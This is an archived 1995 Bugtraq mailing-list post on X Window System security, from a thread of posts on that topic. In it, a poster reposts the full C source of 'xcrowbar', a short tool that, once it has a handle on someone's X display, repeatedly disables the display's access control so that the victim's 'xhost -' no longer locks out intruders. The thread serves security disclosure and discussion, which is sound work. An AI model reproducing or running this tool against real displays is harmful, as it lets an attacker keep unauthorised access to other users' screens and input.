Bugtraq mailing list archives
xcrowbar
From: wam () cs purdue edu (William McVey)
Date: Wed, 11 Jan 1995 13:27:36 -0500
der Mouse wrote:
What's xcrowbar, and how does it "turn[] off the authority mechanisms altogether"? In my experience, only clients running on the local host, or the xdm host if the server was started with xdm, can fiddle with the access control mechanisms.
Since several people have asked me about xcrowbar in private mail. I'm just going to reply to the group. xcrowbar was posted to comp.security.unix a few months back. Since the source code is so short and the problem (people give access to their displays to un trustworthy people) has a known solution (only give trustworthy people access to your display), I'm reposting the article here. I've attached the original article (minus a few headers) to the bottom of this mail. It should be obvious what it does. As for only the local host or xdm host being able to "fiddle with the access control mechanism", I highly doubt that the statement is true. X servers (well, at least the distributed ones) don't pay any special attention to whether a client is local or remote.
In any case, yes, it's true that "xhost -" doesn't magically mean you're safe again. What I do, to get the convenience of "xhost -" without giving up quite as much security, is I run a front-end program that accepts connections, ...
<snip> I don't suppose the program you run is freely available someplace? -- William ---- Begin article about xcrowbar ---- Article: 8570 of comp.security.unix From: matt () cs su oz au (Robert Matthew Barrie) Newsgroups: comp.security.unix Subject: xcrowbar.c Date: 1 Oct 1994 05:32:44 GMT Organization: Basser Department of Computer Science, University of Sydney Distribution: world Message-ID: <36is9s$qrb () staff cs su oz au> Like I said, a simple program that lets you do a XDisableAccessControl() on a display if someone decides to "xhost -" you after you have a pointer to their display. matt --- cut here #include <stdio.h> #include <X11/Xlib.h> #include <ctype.h> main (int argc, char *argv[]) { Display *dpy; char *dis = NULL; int c; dis= argv[1]; if ((dpy = XOpenDisplay(dis))==NULL){ perror("could not open window"); exit(0); } while ((c=getchar())!='q') XDisableAccessControl(dpy); XCloseDisplay(dpy); } ---- End article about xcrowbar ----
Current thread:
- Re: Xwindows security? der Mouse (Jan 06)
- Re: Xwindows security? Bennett Todd (Jan 09)
- Re: Xwindows security? Benjamin Fried (Jan 10)
- Re: Xwindows security? Jon Peatfield (Jan 10)
- Re: Xwindows security? Rens Troost (Jan 11)
- Re: Xwindows security? Jon Peatfield (Jan 11)
- Re: Xwindows security? Rens Troost (Jan 11)
- Re: Xwindows security? Jon Peatfield (Jan 11)
- xcrowbar William McVey (Jan 11)
- xcrowbar der Mouse (Jan 11)
- Re: Xwindows security? Dave Kinchlea (Jan 11)
- Re: Xwindows security? Adam Shostack (Jan 11)
- Re: Xwindows security? Darren Reed (Jan 11)
- Re: Xwindows security? Benjamin Fried (Jan 10)
- Re: Xwindows security? Bennett Todd (Jan 09)
- Re: Xwindows security? Jim McCoy (Jan 11)
- Re: Xwindows security? Julian Assange (Jan 13)
- Re: Xwindows security? Timothy Newsham (Jan 11)
- about /usr/etc/chill *Hobbit* (Jan 11)
- mountd keeps vanishing (!) Eric Berggren (Jan 11)
- Re: mountd keeps vanishing (!) Eric Kimminau (Jan 12)